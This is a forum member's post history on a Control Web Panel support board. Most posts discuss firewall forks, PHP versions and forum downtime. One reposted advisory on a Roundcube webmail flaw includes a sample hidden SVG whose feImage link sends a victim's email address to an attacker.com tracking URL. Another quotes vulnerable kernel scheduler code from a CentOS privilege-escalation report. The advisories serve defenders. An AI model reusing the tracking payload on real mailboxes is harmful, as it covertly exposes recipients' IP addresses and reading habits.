Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
1
CSF Firewall / Re: CSF Auto Update Re-Enabled v14.24 and v15.00
« on: March 01, 2026, 02:51:31 AM »2
CSF Firewall / Re: CSF Auto Update Re-Enabled v14.24 and v15.00
« on: February 24, 2026, 09:50:52 PM »
No the mirrors is no longer active as there are different upgrades available.
We have been working with Aetherinox fork.
You can see how to upgrade to this fork at:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/
In addition to our public KB, we have also setup support forums at: https://sysadmin.help
We have been working with Aetherinox fork.
You can see how to upgrade to this fork at:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/
In addition to our public KB, we have also setup support forums at: https://sysadmin.help
3
Other / Re: Goodbye CWP — I’m done for good
« on: February 22, 2026, 06:36:26 PM »I don't understand the point of these "suicide note" posts. Fine, make a choice, do it.
Because haters are gonna hate.
You look at the post history, and that's all they have posted since post 1.
Bashing CWP in one way or another, and all saying it's a 'dead project'.
4
PHP Selector / Re: Support for PHP 8.4
« on: February 18, 2026, 07:18:00 PM »Your be better posting it here https://www.alphagnu.com as cwp spends more time down than up.True. The forums here where down for 3 days, again.
sysadmin.help is live now also.
And SSL works
5
DNS / Re: Problem connecting to CWP server on Cloudflare
« on: February 18, 2026, 07:15:52 PM »
CWP doesn't talk to Cloudflare.
So any changes on your CWP server won't affect Cloudflare, and vs versa.
So any changes on your CWP server won't affect Cloudflare, and vs versa.
6
Other / Re: Goodbye CWP — I’m done for good
« on: February 18, 2026, 07:10:18 PM »Completely agree with Jaspreet Singh.
This project seems to be dead, as we have not received any updates since Nov 2024, and there is no support on the forum either.
Some time ago, I contacted the CWP team, and they said they were working, but they blocked me then. There are a few members who are running the forum by just saying "CWP Team is working, CWP is not dead, blah blah, etc.." and a few of them are sharing their article users, but the actual CWP team doesn't bother looking at the forum.
It's time to move on
Project is NOT DEAD. Not sure why you keep posting that line...
CWP pushed an update today (2026-02-18) 0.9.8.1222.
And before that 0.9.8.1221 was pushed on 2026-02-02
It's personal preference if you want to stop using CWP and 'move on'
I've tested other panels, and they all have CVEs and can not be kept updated as easily as CWP can be.
Some don't even have the features CWP has, and cost $$$ more.
Can CWP do better with some things, yes.
7
Other / Re: CWP Forums constantly down
« on: February 12, 2026, 11:03:27 AM »Yes, I have already reported the problem to José, it is due to an old and no longer updated version of SMF. I suggested to José that he switch to PHPBB, which is much more robust and much better in this regard.
phpBB is good, but SMF 2.1.6 seemed better IMO, but I got out voted for another project. :/
sysadmin.help is finally live.
Feel free to post here & there.
8
PHP Selector / Re: Support for PHP 8.4
« on: February 12, 2026, 11:00:29 AM »
The guide at:
https://www.alphagnu.com/topic/615-install-latest-version-of-php-84-php-switcher-in-cwp-control-web-panel-el89-almalinux-89/
Is for both AlmaLinux 8 and 9.
If you are running either of those you should not have to 'tweat' any paths.
Some modules where retired when PHP 8.4 was released, like IMAP in 8.4, that now need to be loaded via PECL.
https://www.alphagnu.com/topic/615-install-latest-version-of-php-84-php-switcher-in-cwp-control-web-panel-el89-almalinux-89/
Is for both AlmaLinux 8 and 9.
If you are running either of those you should not have to 'tweat' any paths.
Some modules where retired when PHP 8.4 was released, like IMAP in 8.4, that now need to be loaded via PECL.
9
Mod_Security / Re: Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« on: February 11, 2026, 08:40:41 PM »
The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.
11
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
Code: [Select]
text<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
12
CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
« on: February 09, 2026, 03:36:30 PM »
For those running CentOS Stream 9, this is a Major Vulnerability.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Code: [Select]
cstatic s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
// ...
if (q->buffer_used > q->buffer_limit) { // [1] Check buffer limit
u32 dropped = 0;
while (q->buffer_used > q->buffer_limit) {
dropped++;
cake_drop(sch, to_free); // [2] Packet is DROPPED here
}
b->drop_overlimit += dropped;
}
return NET_XMIT_SUCCESS; // [!] Returns SUCCESS anyway
} Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
13
CSF Firewall / Re: Should we update CSF to V15??
« on: February 06, 2026, 02:19:35 PM »
They are 2 sperate CSF forks.
Hence all the forks have different version numbers now, not a universal one.
Some could use the last CSF v15.00 code, call it CSF2 with v1.0
If you want to switch to the Sentinel fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.
But it's all personal preference at this time.
Hence all the forks have different version numbers now, not a universal one.
Some could use the last CSF v15.00 code, call it CSF2 with v1.0
If you want to switch to the Sentinel fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.
But it's all personal preference at this time.
14
CentOS 9 Problems / Re: ClamAV issue in user panel
« on: February 05, 2026, 12:23:49 PM »
With AlmaLinux 9, things have to be installed in a certain way.
Including ClamAV.
If not, they will not work.
There is an old install guide running around the forums on the proper way to install AlmaLinux 9 and CWP.
Including ClamAV.
If not, they will not work.
There is an old install guide running around the forums on the proper way to install AlmaLinux 9 and CWP.
15
Mod_Security / Re: atomic crop. free waf rules set
« on: January 31, 2026, 06:49:36 PM »
By all means have fun using AI...
When your server is hacked, maybe you can ask it for help also...
But don't blame CWP or anything else when it happens...
When your server is hacked, maybe you can ask it for help also...
But don't blame CWP or anything else when it happens...
